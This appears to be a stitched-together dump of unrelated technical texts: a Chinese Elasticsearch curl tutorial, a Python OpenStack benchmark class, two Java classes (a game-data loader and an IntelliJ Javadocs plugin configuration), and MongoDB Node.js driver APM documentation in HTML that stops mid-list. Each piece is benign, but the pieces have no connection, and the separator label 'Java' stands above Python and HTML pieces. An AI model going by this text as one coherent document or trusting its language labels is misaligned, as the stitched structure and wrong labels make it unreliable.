Elasticsearch数据库可使用HTTP的GET、PUT等方法访问和修改。

### PUT添加数据

```sh
curl -T $JSON_FILE "http://localhost:9200/$INDEX/$TYPE/$ID"
```
其中$JSON_FILE是json数据文件,$INDEX是索引名,$TYPE是类型名,$ID是记录编号。<br><br> 另外,若相同编号的记录已存在,PUT操作则会更新之。 ### GET访问数据 ```sh curl -XGET "http://localhost:9200/$INDEX/$TYPE/$ID" ``` ### GET无条件查询数据 ```sh curl -XGET "http://localhost:9200/$INDEX/$TYPE/_search" ``` 该操作会列出同索引同类型的所有记录。 ### GET条件查询数据 ```sh curl -XGET "http://localhost:9200/$INDEX/$TYPE/_search?q=$COND:$VALUE" ``` 其中$COND是条件名,$VALUE是条件值,该操作会列出同索引同类型符合条件的记录。 ### DELETE删除数据 ```sh curl -XDELETE "http://localhost:9200/$INDEX/$TYPE/$ID" ``` <br> 更多方法详见 [官方文档](https://www.elastic.co/guide/en/elasticsearch/reference/current/index.html) 。
Java
# Copyright (c) 2015 Intel Research and Development Ireland Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import instantiation_validation_benchmark as base
from experimental_framework import common


NUM_OF_NEIGHBORS = 'num_of_neighbours'
AMOUNT_OF_RAM = 'amount_of_ram'
NUMBER_OF_CORES = 'number_of_cores'
NETWORK_NAME = 'network'
SUBNET_NAME = 'subnet'


class InstantiationValidationNoisyNeighborsBenchmark(
        base.InstantiationValidationBenchmark):
    """Instantiation validation benchmark that additionally deploys "noisy
    neighbor" stress-workload stacks so the validation runs under load."""

    def __init__(self, name, params):
        base.InstantiationValidationBenchmark.__init__(self, name, params)

        # The liberty release uses a dedicated heat template variant.
        if common.RELEASE == 'liberty':
            temp_name = 'stress_workload_liberty.yaml'
        else:
            temp_name = 'stress_workload.yaml'

        self.template_file = common.get_template_dir() + \
            temp_name
        self.stack_name = 'neighbour'
        self.neighbor_stack_names = list()

    def get_features(self):
        """Return the benchmark description, its parameters and the allowed
        and default values for each parameter."""
        features = super(InstantiationValidationNoisyNeighborsBenchmark,
                         self).get_features()
        # Typo fixed: "neghbors" -> "neighbors".
        features['description'] = 'Instantiation Validation Benchmark ' \
                                  'with noisy neighbors'
        features['parameters'].append(NUM_OF_NEIGHBORS)
        features['parameters'].append(AMOUNT_OF_RAM)
        features['parameters'].append(NUMBER_OF_CORES)
        features['parameters'].append(NETWORK_NAME)
        features['parameters'].append(SUBNET_NAME)
        features['allowed_values'][NUM_OF_NEIGHBORS] = \
            ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10']
        features['allowed_values'][NUMBER_OF_CORES] = \
            ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9', '10']
        features['allowed_values'][AMOUNT_OF_RAM] = \
            ['256M', '1G', '2G', '3G', '4G', '5G', '6G', '7G', '8G',
             '9G', '10G']
        features['default_values'][NUM_OF_NEIGHBORS] = '1'
        features['default_values'][NUMBER_OF_CORES] = '1'
        features['default_values'][AMOUNT_OF_RAM] = '256M'
        features['default_values'][NETWORK_NAME] = ''
        features['default_values'][SUBNET_NAME] = ''
        return features

    def init(self):
        """Point the lua workload at the results file and deploy one heat
        stack per requested noisy neighbor."""
        super(InstantiationValidationNoisyNeighborsBenchmark, self).init()
        common.replace_in_file(self.lua_file, 'local out_file = ""',
                               'local out_file = "' +
                               self.results_file + '"')
        heat_param = dict()
        heat_param['network'] = self.params[NETWORK_NAME]
        heat_param['subnet'] = self.params[SUBNET_NAME]
        # Use the module-level parameter-name constants instead of repeating
        # the raw strings (they were inconsistent with get_features()).
        heat_param['cores'] = self.params[NUMBER_OF_CORES]
        heat_param['memory'] = self.params[AMOUNT_OF_RAM]
        for i in range(0, int(self.params[NUM_OF_NEIGHBORS])):
            stack_name = self.stack_name + str(i)
            common.DEPLOYMENT_UNIT.deploy_heat_template(self.template_file,
                                                        stack_name,
                                                        heat_param)
            self.neighbor_stack_names.append(stack_name)

    def finalize(self):
        """Restore the lua workload file and tear down every neighbor stack
        deployed by init()."""
        common.replace_in_file(self.lua_file, 'local out_file = "' +
                               self.results_file + '"',
                               'local out_file = ""')
        # destroy neighbor stacks
        for stack_name in self.neighbor_stack_names:
            common.DEPLOYMENT_UNIT.destroy_heat_template(stack_name)
        self.neighbor_stack_names = list()
Java
package de.nl.moo.data.loader.systems; import de.nl.moo.data.beans.systems.SystemsApplyerBean; import de.nl.moo.data.beans.systems.SystemsBean; import de.nl.moo.data.beans.systems.SystemsSystemBean; import de.nl.moo.data.dao.GameBeanDAO; import de.nl.moo.data.loader.AbstractBeanLoader; import org.springframework.beans.factory.annotation.Autowired; import javax.inject.Provider; import java.nio.file.Path; import java.util.ArrayList; import java.util.List; public class SystemsBeanLoader extends AbstractBeanLoader<SystemsBean> { @Autowired private SystemsBean systemsBean = null; @Autowired private Provider<SystemsSystemBeanLoader> systemLoaderProvider = null; @Autowired private Provider<SystemsApplyerBeanLoader> applyerLoaderProvider = null; public SystemsBeanLoader() { super(); } @Override protected SystemsBean load(GameBeanDAO dao) { List<SystemsApplyerBean> applyers = this.loadApplyers(dao); this.systemsBean.setApplyers(applyers); List<SystemsSystemBean> systems = this.loadSystems(dao); this.systemsBean.setSystems(systems); return this.systemsBean; } // ############################################## private List<SystemsApplyerBean> loadApplyers(GameBeanDAO dao) { Path file = dao.getFile(); Path parent = file.getParent(); List<String> paths = dao.getList("applyers"); List<SystemsApplyerBean> applyers = new ArrayList<>(); paths.stream() .map(parent::resolve) .map(this::loadApplyer) .forEach(applyers::add); return applyers; } private SystemsApplyerBean loadApplyer(Path path) { SystemsApplyerBeanLoader beanLoader = this.applyerLoaderProvider.get(); SystemsApplyerBean applyerBean = beanLoader.load(path); return applyerBean; } // ############################################## private List<SystemsSystemBean> loadSystems(GameBeanDAO dao) { Path file = dao.getFile(); Path parent = file.getParent(); List<String> paths = dao.getList("systems"); List<SystemsSystemBean> systems = new ArrayList<>(); paths.stream() .map(parent::resolve) .map(this::loadSystem) 
.forEach(systems::add); return systems; } private SystemsSystemBean loadSystem(Path path) { SystemsSystemBeanLoader beanLoader = this.systemLoaderProvider.get(); SystemsSystemBean systemBean = beanLoader.load(path); return systemBean; } }
Java
package com.github.setial.intellijjavadocs.configuration.impl;

import com.github.setial.intellijjavadocs.configuration.JavaDocConfiguration;
import com.github.setial.intellijjavadocs.exception.SetupTemplateException;
import com.github.setial.intellijjavadocs.model.settings.JavaDocSettings;
import com.github.setial.intellijjavadocs.model.settings.Level;
import com.github.setial.intellijjavadocs.model.settings.Mode;
import com.github.setial.intellijjavadocs.model.settings.Visibility;
import com.github.setial.intellijjavadocs.template.DocTemplateManager;
import com.intellij.openapi.components.PersistentStateComponent;
import com.intellij.openapi.components.ServiceManager;
import com.intellij.openapi.components.State;
import com.intellij.openapi.components.Storage;
import com.intellij.openapi.diagnostic.Logger;
import com.intellij.openapi.ui.Messages;
import org.jdom.Element;
import org.jetbrains.annotations.NotNull;
import org.jetbrains.annotations.Nullable;

import java.util.HashSet;
import java.util.Set;

import static com.github.setial.intellijjavadocs.configuration.JavaDocConfiguration.COMPONENT_CONFIG_PATH;

/**
 * Persistent configuration component for the Javadocs plugin.
 * <p>
 * Holds the plugin's {@link JavaDocSettings}, persists them as XML through the
 * IntelliJ {@link PersistentStateComponent} mechanism, and pushes the template
 * settings into the {@link DocTemplateManager}.
 *
 * @author Sergey Timofiychuk
 */
@State(
        name = JavaDocConfiguration.COMPONENT_NAME,
        storages = {
                @Storage(value = COMPONENT_CONFIG_PATH)
        }
)
public class JavaDocConfigurationImpl implements JavaDocConfiguration, PersistentStateComponent<Element> {

    public static final String JAVADOCS_PLUGIN_TITLE_MSG = "Javadocs plugin";

    private static final Logger LOGGER = Logger.getInstance(JavaDocConfigurationImpl.class);

    private JavaDocSettings settings;
    private DocTemplateManager templateManager;
    // True once settings came from (or were written to) persisted state;
    // guards initSettings() from overwriting them with defaults.
    private boolean loadedStoredConfig = false;

    /**
     * Instantiates a new Java doc configuration object.
     */
    public JavaDocConfigurationImpl() {
        templateManager = ServiceManager.getService(DocTemplateManager.class);
        initSettings();
    }

    /**
     * Returns the current plugin settings.
     */
    @Override
    public JavaDocSettings getConfiguration() {
        return settings;
    }

    /**
     * Serializes the current settings to a DOM element for persistence.
     * Also marks the configuration as stored so defaults are not re-applied.
     */
    @Nullable
    @Override
    public Element getState() {
        Element root = new Element("JAVA_DOC_SETTINGS_PLUGIN");
        if (settings != null) {
            settings.addToDom(root);
            loadedStoredConfig = true;
        }
        return root;
    }

    /**
     * Restores settings from persisted XML and applies the stored templates
     * to the template manager.
     */
    @Override
    public void loadState(@NotNull Element javaDocSettings) {
        settings = new JavaDocSettings(javaDocSettings);
        setupTemplates();
        loadedStoredConfig = true;
    }

    // Populates default settings; no-op when persisted state was already loaded.
    private void initSettings() {
        if (!loadedStoredConfig) {
            // setup default values
            settings = new JavaDocSettings();
            Set<Level> levels = new HashSet<>();
            levels.add(Level.TYPE);
            levels.add(Level.METHOD);
            levels.add(Level.FIELD);

            Set<Visibility> visibilities = new HashSet<>();
            visibilities.add(Visibility.PUBLIC);
            visibilities.add(Visibility.PROTECTED);
            visibilities.add(Visibility.DEFAULT);

            settings.getGeneralSettings().setOverriddenMethods(false);
            settings.getGeneralSettings().setSplittedClassName(true);
            settings.getGeneralSettings().setMode(Mode.UPDATE);
            settings.getGeneralSettings().setLevels(levels);
            settings.getGeneralSettings().setVisibilities(visibilities);

            // Seed the template settings from the manager's built-in templates.
            settings.getTemplateSettings().setClassTemplates(templateManager.getClassTemplates());
            settings.getTemplateSettings().setConstructorTemplates(templateManager.getConstructorTemplates());
            settings.getTemplateSettings().setMethodTemplates(templateManager.getMethodTemplates());
            settings.getTemplateSettings().setFieldTemplates(templateManager.getFieldTemplates());
        }
    }

    /**
     * Pushes the configured templates into the template manager; shows an
     * error dialog (and logs) if any template fails to compile.
     */
    @Override
    public void setupTemplates() {
        try {
            templateManager.setClassTemplates(settings.getTemplateSettings().getClassTemplates());
            templateManager.setConstructorTemplates(settings.getTemplateSettings().getConstructorTemplates());
            templateManager.setMethodTemplates(settings.getTemplateSettings().getMethodTemplates());
            templateManager.setFieldTemplates(settings.getTemplateSettings().getFieldTemplates());
        } catch (SetupTemplateException e) {
            LOGGER.error(e);
            Messages.showErrorDialog("Javadocs plugin is not available, cause: " + e.getMessage(), JAVADOCS_PLUGIN_TITLE_MSG);
        }
    }
}
Java
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content=""> <meta name="author" content=""> <meta name="keyword" content=""> <link rel="shortcut icon" href="/node-mongodb-native/3.1/img/favicon.png"> <title>APM</title> <link rel="stylesheet" href="/node-mongodb-native/3.1/lib/bootstrap.css" type="text/css" /> <link rel="stylesheet" href="/node-mongodb-native/3.1/lib/font-awesome/css/font-awesome.min.css" type="text/css" /> <link rel="stylesheet" href="/node-mongodb-native/3.1/css/mongodb-docs.css" type="text/css" /> <link rel="stylesheet" href="/node-mongodb-native/3.1/css/overrides.css" type="text/css" /> <link rel="stylesheet" href="/node-mongodb-native/3.1/lib/highlight/styles/idea.css" /> <link rel="stylesheet" href="/node-mongodb-native/3.1/lib/bootstrap-toggle/bootstrap-toggle.min.css" type="text/css" /> <link rel="stylesheet" href="/node-mongodb-native/3.1/css/java.css" type="text/css" /> </head> <body> <section id="container" class=""> <header id="header-db" class="row" role="navigation"> <div class="header-content"> <div class="toggle-nav pull-left"> <i class="fa fa-bars"></i> <div class="icon-reorder tooltips" data-original-title="Toggle Navigation" data-placement="bottom"></div> </div> <div class="logo pull-left"> <a href="https://www.mongodb.com/"> <img src="http://mongodb.github.io/node-mongodb-native/img/logo-mongodb-header.png", alt="MongoDB.com" /> </a> </div> <div> <div class="nav-items pull-right"> <a href="https://university.mongodb.com" data-toggle="tooltip" data-placement="bottom" title="Free Online Classes">MongoDB University</a> <a href="http://www.mongodb.org/downloads" data-toggle="tooltip" data-placement="bottom" title="Download MongoDB">Downloads</a> <a href="http://www.mongodb.org/get-involved" data-toggle="tooltip" data-placement="bottom" title="Get involved with MongoDB">Community</a> <a href="http://docs.mongodb.org" 
data-toggle="tooltip" data-placement="bottom" title="The MongoDB Documentation">Docs</a> <a href="http://blog.mongodb.org" data-toggle="tooltip" data-placement="bottom" title="The MongoDB Blog">Blog</a> <div id="search"> <form method="get" action="//www.google.com/search" target="_blank"> <input type="text" name="searchQuery" size="20" value="" autocomplete="off" placeholder="Search docs"> <input type="hidden" name="site" value="/node-mongodb-native/3.1"> <input type="hidden" name="q" value=""> <label for="searchQuery"><i class="fa fa-search fa-1"></i></label> </form> </div> </div> </div> </div> </header> <aside id="sidebar" class="sidebar"> <div class="ssidebar nav-collapse"> <div class="ssidebarwrapper"> <h3> <a class="index-link" href="/node-mongodb-native/3.1/../">MongoDB Node.js Driver</a> <a class="version pull-right" href="/node-mongodb-native/3.1">3.1</a> </h3> <ul class="sidebar-menu"> <li class="toctree-l1"> <a href="/node-mongodb-native/3.1/installation-guide/installation-guide/"> <i class='fa fa-puzzle-piece'></i> Installation Guide </a> </li> <li class="toctree-l1"> <a href="/node-mongodb-native/3.1/quick-start/quick-start/"> <i class='fa fa-road'></i> Quick Start </a> </li> <li class="toctree-l1 "> <a href="/node-mongodb-native/3.1/tutorials/main/" class=""> <i class='fa fa-thumb-tack'></i> <span>Tutorials</span> <span class="menu-arrow fa fa-angle-right"></span> </a> <ul > <li class="toctree-l2 "> <a href="/node-mongodb-native/3.1/tutorials/connect/" class=""> <i class='fa'></i> <span>Connect to MongoDB</span> </a> <ul > <li class="toctree-l3"> <a href="/node-mongodb-native/3.1/tutorials/connect/authenticating/"> <i class='fa'></i> Authentication </a> </li> <li class="toctree-l3"> <a href="/node-mongodb-native/3.1/tutorials/connect/ssl/"> <i class='fa'></i> SSL Settings </a> </li> </ul> </li> <li class="toctree-l2"> <a href="/node-mongodb-native/3.1/tutorials/collations/"> <i class='fa'></i> Collations </a> </li> <li class="toctree-l2"> <a 
href="/node-mongodb-native/3.1/tutorials/collections/"> <i class='fa'></i> Collections </a> </li> <li class="toctree-l2"> <a href="/node-mongodb-native/3.1/tutorials/create-indexes/"> <i class='fa'></i> Create Indexes </a> </li> <li class="toctree-l2"> <a href="/node-mongodb-native/3.1/tutorials/crud/"> <i class='fa'></i> CRUD Operations </a> </li> <li class="toctree-l2"> <a href="/node-mongodb-native/3.1/tutorials/projections/"> <i class='fa'></i> Projections </a> </li> <li class="toctree-l2"> <a href="/node-mongodb-native/3.1/tutorials/aggregation/"> <i class='fa'></i> Aggregation </a> </li> <li class="toctree-l2"> <a href="/node-mongodb-native/3.1/tutorials/text-search/"> <i class='fa'></i> Text Search </a> </li> <li class="toctree-l2"> <a href="/node-mongodb-native/3.1/tutorials/geospatial-search/"> <i class='fa'></i> Geospatial Search </a> </li> <li class="toctree-l2"> <a href="/node-mongodb-native/3.1/tutorials/commands/"> <i class='fa'></i> Database Commands </a> </li> <li class="toctree-l2 "> <a href="/node-mongodb-native/3.1/tutorials/gridfs/" class=""> <i class='fa'></i> <span>GridFS</span> </a> <ul > <li class="toctree-l3"> <a href="/node-mongodb-native/3.1/tutorials/gridfs/streaming/"> <i class='fa'></i> GridFS API </a> </li> <li class="toctree-l3"> <a href="/node-mongodb-native/3.1/tutorials/gridfs/gridstore/"> <i class='fa'></i> Legacy GridStore </a> </li> </ul> </li> </ul> </li> <li class="toctree-l1 current"> <a href="/node-mongodb-native/3.1/reference/main/" class=""> <i class='fa fa-book'></i> <span>Reference</span> <span class="menu-arrow fa fa-angle-down"></span> </a> <ul class="current"> <li class="toctree-l2 "> <a href="/node-mongodb-native/3.1/reference/connecting/" class=""> <i class='fa'></i> <span>Connection Options</span> </a> <ul > <li class="toctree-l3"> <a href="/node-mongodb-native/3.1/reference/connecting/connection-settings/"> <i class='fa'></i> Connection Settings </a> </li> </ul> </li> <li class="toctree-l2 "> <a 
href="/node-mongodb-native/3.1/reference/ecmascriptnext/" class=""> <i class='fa'></i> <span>ECMAScript Next</span> </a> <ul > <li class="toctree-l3"> <a href="/node-mongodb-native/3.1/reference/ecmascriptnext/connecting/"> <i class='fa'></i> Connecting </a> </li> <li class="toctree-l3"> <a href="/node-mongodb-native/3.1/reference/ecmascriptnext/crud/"> <i class='fa'></i> CRUD Operations </a> </li> </ul> </li> <li class="toctree-l2 current"> <a href="/node-mongodb-native/3.1/reference/management/" class=""> <i class='fa'></i> <span>Management</span> </a> <ul class="current"> <li class="toctree-l3"> <a href="/node-mongodb-native/3.1/reference/management/logging/"> <i class='fa'></i> Logging </a> </li> <li class="toctree-l3"> <a href="/node-mongodb-native/3.1/reference/management/apm/"> <i class='fa'></i> APM </a> </li> <li class="toctree-l3"> <a href="/node-mongodb-native/3.1/reference/management/sdam-monitoring/"> <i class='fa'></i> Topology Monitoring </a> </li> </ul> </li> <li class="toctree-l2"> <a href="/node-mongodb-native/3.1/reference/pool/"> <i class='fa'></i> Pool Design </a> </li> <li class="toctree-l2"> <a href="/node-mongodb-native/3.1/reference/faq/"> <i class='fa'></i> Frequently Asked Questions </a> </li> </ul> </li> <li class="toctree-l1 "> <a href="/node-mongodb-native/3.1/upgrade-migration/main/" class=""> <i class='fa fa-cog'></i> <span>Upgrade Guide</span> <span class="menu-arrow fa fa-angle-right"></span> </a> <ul > <li class="toctree-l2"> <a href="/node-mongodb-native/3.1/upgrade-migration/upgrading/"> <i class='fa fa-wrench'></i> Upgrading to 2.x </a> </li> </ul> </li> <li class="toctree-l1"> <a href="/node-mongodb-native/3.1/api"> <i class='fa fa-file-text-o'></i> API Documentation </a> </li> <li class="toctree-l1"> <a href="https://github.com/mongodb/node-mongodb-native"> <i class='fa fa-github'></i> Source Code </a> </li> <li class="toctree-l1"> <a href="/node-mongodb-native/3.1/issues-help/"> <i class='fa fa-life-ring'></i> Issues &amp; 
Help </a> </li> <li class="toctree-l1"> <a href="https://gitter.im/mongodb/node-mongodb-native?utm_source=badge&amp;utm_medium=badge&amp;utm_campaign=pr-badge"> <img src='https://badges.gitter.im/Join Chat.svg'/> </a> </li> </ul> </div> </div> </aside> <div class="option-popup closed hidden" id="optionsVersionsPopup"> <div class="option-header"> <i class="fa fa-gear"></i> <span>OPTIONS</span> <i class="fa fa-angle-up pull-right"></i> </div> <div class="option-body"> <ul> <li> <label>Version</label> <div class="btn-group btn-group-xs pull-right"> <button type="button" class="btn btn-default dropdown-toggle" data-toggle="dropdown"> Select Version <span class="caret"></span> </button> <ul class="dropdown-menu" role="menu" id="optionsVersionsMenu"> </ul> </div> </li> </ul> </div> </div> <section id="main-content" class="content"> <section class="main-column pull-left"> <div class="document"> <div class="documentwrapper"> <div class="bodywrapper"> <div class="body"> <div class="alert alert-info" role="alert"> Note: You are currently viewing version 3.1 of the Node.js driver documentation. <a href="https://docs.mongodb.com/drivers/node">Click here</a> for the latest version. </div> <a class="edit-link" href="https://github.com/mongodb/node-mongodb-native/blob/3.1/docs/reference/content/reference/management/apm.md" target="_blank" title="Edit reference/management/apm.md on GitHub"><i class="fa fa-pencil-square-o"></i></a> <div class="bc"> <ul> <li><a href="/node-mongodb-native/3.1/reference/main/">Reference</a> <i class="fa fa-angle-right"></i></li> <li><a href="/node-mongodb-native/3.1/reference/management/">Management</a> <i class="fa fa-angle-right"></i></li> <li>APM</li> </ul> </div> <h1 id="apm">APM</h1> <p>Application Performance Monitoring support is a driver feature that allows monitoring services to hook into the driver in a forward compatible and stable way. 
The API is not applied to the driver unless explicitly initialized to avoid any performance penalties.</p> <h2 id="api">API</h2> <p>The following code example hooks into all the available features of the APM API.</p> <pre><code class="language-js">const listener = require('mongodb').instrument({ operationIdGenerator: { operationId: 1, next: function() { return this.operationId++; } }, timestampGenerator: { current: function() { return new Date().getTime(); }, duration: function(start, end) { return end - start; } } }, function(err, instrumentations) { // Instrument the driver }); listener.on('started', function(event) { // command start event (see https://github.com/mongodb/specifications/blob/master/source/command-monitoring/command-monitoring.rst) }); listener.on('succeeded', function(event) { // command success event (see https://github.com/mongodb/specifications/blob/master/source/command-monitoring/command-monitoring.rst) }); listener.on('failed', function(event) { // command failure event (see https://github.com/mongodb/specifications/blob/master/source/command-monitoring/command-monitoring.rst) }); </code></pre> <p>There are two main aspects to the APM API. The first one is the command monitoring specification and the second one is the instrumentation method.</p> <h2 id="command-monitoring">Command Monitoring</h2> <p>Command monitoring is based on the cross-driver specification for MongoDB found in the Command monitoring <a href="https://github.com/mongodb/specifications/blob/master/source/command-monitoring/command-monitoring.rst">specification</a>.</p> <p>The Command monitoring specification is a low-level monitoring specification that sends a notification when a new command is executed against MongoDB and if it fails or succeeds. 
In most cases this is straightforward and you will receive a single start and either a success or failure event.</p> <p>In this example, the user executes the <code>isMaster</code> command against the server and receives the following messages (full objects are abbreviated for simplicity&rsquo;s sake). When the <code>isMaster</code> command starts execution we receive the following event (this result is from <code>JSON.stringify</code>; in the real event the connectionId is the actual connection object the command was executed against).</p> <pre><code class="language-js">{ &quot;command&quot;: { &quot;ismaster&quot;: true }, &quot;databaseName&quot;: &quot;system&quot;, &quot;commandName&quot;: &quot;ismaster&quot;, &quot;requestId&quot;: 7, &quot;operationId&quot;: 1, &quot;connectionId&quot;: { &quot;id&quot;: 8, &quot;host&quot;: &quot;localhost&quot;, &quot;port&quot;: 27017 } } </code></pre> <p><code>requestId</code> is the id used for the wire protocol message sent to MongoDB and allows you to correlate the commands executed on MongoDB with the commands from the driver.</p> <p><code>operationId</code> is an id that is used to group commands into a single logical command execution. Use cases are queries and batch writes where a single logical operation might be executed as multiple commands to the server. For a query this might mean it gets executed as a <code>find</code> command and <em>n</em> number of <code>getMore</code> commands as well as a <code>killCursors</code> command. For bulk writes the logical grouping might contain <code>n</code> individual write operations. 
The goal of <code>operationId</code> is to allow APM providers to correlate the breakdown of a cursor or bulk operation with the method called by the user.</p> <p>A typical example:</p> <pre><code class="language-js">db.collection('data').find().batchSize(2).toArray(function(err, docs) { }); </code></pre> <p>That might be translated to <code>1</code> find, <code>n</code> getMores and <code>0|1</code> killCursors.</p> <p>After the command executed successfully it sends the following result:</p> <pre><code class="language-js">{ &quot;duration&quot;: 0, &quot;commandName&quot;: &quot;ismaster&quot;, &quot;requestId&quot;: 7, &quot;operationId&quot;: 1, &quot;connectionId&quot;: { &quot;id&quot;: 8, &quot;host&quot;: &quot;localhost&quot;, &quot;port&quot;: 27017 }, &quot;reply&quot;: { &quot;ismaster&quot;: true, &quot;maxBsonObjectSize&quot;: 16777216, &quot;maxMessageSizeBytes&quot;: 48000000, &quot;maxWriteBatchSize&quot;: 1000, &quot;localTime&quot;: &quot;2015-08-04T10:26:01.445Z&quot;, &quot;maxWireVersion&quot;: 3, &quot;minWireVersion&quot;: 0, &quot;ok&quot;: 1 } } </code></pre> <p>Notice that the <code>requestId</code> and <code>operationId</code> match up to the start message, allowing the user of the API to correlate the two events.</p> <p>The next example shows a complete <code>find</code> operation that results in multiple <code>getMore</code> responses.</p> <pre><code class="language-js">{ &quot;command&quot;: { &quot;find&quot;: &quot;apm_test_2&quot;, &quot;filter&quot;: { &quot;a&quot;: 1 }, &quot;sort&quot;: { &quot;a&quot;: 1 }, &quot;projection&quot;: { &quot;_id&quot;: 1, &quot;a&quot;: 1 }, &quot;limit&quot;: 100, &quot;skip&quot;: 1, &quot;hint&quot;: { &quot;_id&quot;: 1 }, &quot;batchSize&quot;: 2, &quot;comment&quot;: &quot;some comment&quot;, &quot;maxTimeMS&quot;: 5000, &quot;noCursorTimeout&quot;: true }, &quot;databaseName&quot;: &quot;integration_tests&quot;, &quot;commandName&quot;: &quot;find&quot;, &quot;requestId&quot;: 44, 
&quot;operationId&quot;: 39, &quot;connectionId&quot;: { &quot;id&quot;: 19, &quot;host&quot;: &quot;localhost&quot;, &quot;port&quot;: 27017 } } { &quot;duration&quot;: 1, &quot;commandName&quot;: &quot;find&quot;, &quot;requestId&quot;: 44, &quot;operationId&quot;: 39, &quot;connectionId&quot;: { &quot;id&quot;: 19, &quot;host&quot;: &quot;localhost&quot;, &quot;port&quot;: 27017 }, &quot;reply&quot;: [ { &quot;_id&quot;: &quot;55c096386e3b2283b70c294d&quot;, &quot;a&quot;: 1 }, { &quot;_id&quot;: &quot;55c096386e3b2283b70c294e&quot;, &quot;a&quot;: 1 } ] } { &quot;command&quot;: { &quot;getMore&quot;: &quot;104961726686&quot;, &quot;collection&quot;: &quot;apm_test_2&quot;, &quot;batchSize&quot;: 2, &quot;maxTimeMS&quot;: 5000 }, &quot;databaseName&quot;: &quot;integration_tests&quot;, &quot;commandName&quot;: &quot;getMore&quot;, &quot;requestId&quot;: 44, &quot;operationId&quot;: 39, &quot;connectionId&quot;: { &quot;id&quot;: 19, &quot;host&quot;: &quot;localhost&quot;, &quot;port&quot;: 27017 } } { &quot;duration&quot;: 1, &quot;commandName&quot;: &quot;getMore&quot;, &quot;requestId&quot;: 44, &quot;operationId&quot;: 39, &quot;connectionId&quot;: { &quot;id&quot;: 19, &quot;host&quot;: &quot;localhost&quot;, &quot;port&quot;: 27017 }, &quot;reply&quot;: [ { &quot;_id&quot;: &quot;55c096386e3b2283b70c294f&quot;, &quot;a&quot;: 1 }, { &quot;_id&quot;: &quot;55c096386e3b2283b70c2950&quot;, &quot;a&quot;: 1 } ] } { &quot;command&quot;: { &quot;getMore&quot;: &quot;104961726686&quot;, &quot;collection&quot;: &quot;apm_test_2&quot;, &quot;batchSize&quot;: 2, &quot;maxTimeMS&quot;: 5000 }, &quot;databaseName&quot;: &quot;integration_tests&quot;, &quot;commandName&quot;: &quot;getMore&quot;, &quot;requestId&quot;: 45, &quot;operationId&quot;: 39, &quot;connectionId&quot;: { &quot;id&quot;: 19, &quot;host&quot;: &quot;localhost&quot;, &quot;port&quot;: 27017 } } { &quot;duration&quot;: 0, &quot;commandName&quot;: &quot;getMore&quot;, &quot;requestId&quot;: 45, 
&quot;operationId&quot;: 39, &quot;connectionId&quot;: { &quot;id&quot;: 19, &quot;host&quot;: &quot;localhost&quot;, &quot;port&quot;: 27017 }, &quot;reply&quot;: [ { &quot;_id&quot;: &quot;55c096386e3b2283b70c2951&quot;, &quot;a&quot;: 1 } ] } </code></pre> <p><strong>Note:</strong> all the documents share the same <code>operationId</code>, allowing the APM API user to correctly map the low level commands to the logical command executed by the user (in this case <code>toArray</code> on a cursor).</p> <h3 id="operationidgenerator">operationIdGenerator</h3> <p>The <code>operationIdGenerator</code> option allows the API user to pass in a custom <code>operationId</code> generator object. You can use this object to synchronize internal request IDs in the APM client with the low-level command monitoring API. This synchronization makes it possible to associate the logical method called by the user&rsquo;s code with the low-level commands issued to MongoDB. This allows for a richer APM experience and performance breakdown. Below is a simple <code>operationIdGenerator</code> example.</p> <pre><code class="language-js">const generator = { operationId: 1, next: function() { return this.operationId++; } }; </code></pre> <h3 id="timestampgenerator">timestampGenerator</h3> <p>The <code>timestampGenerator</code> option lets the API user override the method used to timestamp the command monitoring events with a custom timestamp type. The generator contains two methods: <code>current</code> returns the current timestamp, and <code>duration</code> calculates the total operation duration between the <code>start</code> and <code>end</code> time. 
Below is a simple generator example.</p> <pre><code class="language-js">const generator = { current: function() { return new Date().getTime(); }, duration: function(start, end) { return end - start; } } </code></pre> <h2 id="instrumentation">Instrumentation</h2> <p>The <code>instrumentation</code> callback returns the instrumentation points in the driver and associated metadata. In the following example, the result shown is the result from performing <code>JSON.stringify</code>.</p> <pre><code class="language-js">{ &quot;name&quot;: &quot;Gridstore&quot;, &quot;stream&quot;: true, &quot;instrumentations&quot;: [ { &quot;methods&quot;: [ &quot;open&quot;, &quot;getc&quot;, &quot;puts&quot;, &quot;write&quot;, &quot;writeFile&quot;, &quot;close&quot;, &quot;unlink&quot;, &quot;readlines&quot;, &quot;rewind&quot;, &quot;read&quot;, &quot;tell&quot;, &quot;seek&quot; ], &quot;options&quot;: { &quot;callback&quot;: true, &quot;promise&quot;: true } }, { &quot;methods&quot;: [ &quot;eof&quot; ], &quot;options&quot;: { &quot;callback&quot;: false, &quot;promise&quot;: false, &quot;returns&quot;: [ null ] } }, { &quot;methods&quot;: [ &quot;stream&quot; ], &quot;options&quot;: { &quot;callback&quot;: false, &quot;promise&quot;: false, &quot;returns&quot;: [ null ] } }, { &quot;methods&quot;: [ &quot;destroy&quot; ], &quot;options&quot;: { &quot;callback&quot;: false, &quot;promise&quot;: false } }, { &quot;methods&quot;: [ &quot;chunkCollection&quot;, &quot;collection&quot; ], &quot;options&quot;: { &quot;callback&quot;: true, &quot;promise&quot;: false, &quot;returns&quot;: [ null ] } }, { &quot;methods&quot;: [ &quot;exist&quot;, &quot;list&quot;, &quot;read&quot;, &quot;readlines&quot;, &quot;unlink&quot; ], &quot;options&quot;: { &quot;callback&quot;: true, &quot;promise&quot;: true, &quot;static&quot;: true } } ] } </code></pre> <ul> <li><code>name</code> the name of the class exposed for instrumentation.</li> <li><code>stream</code> tells the user if the object can 
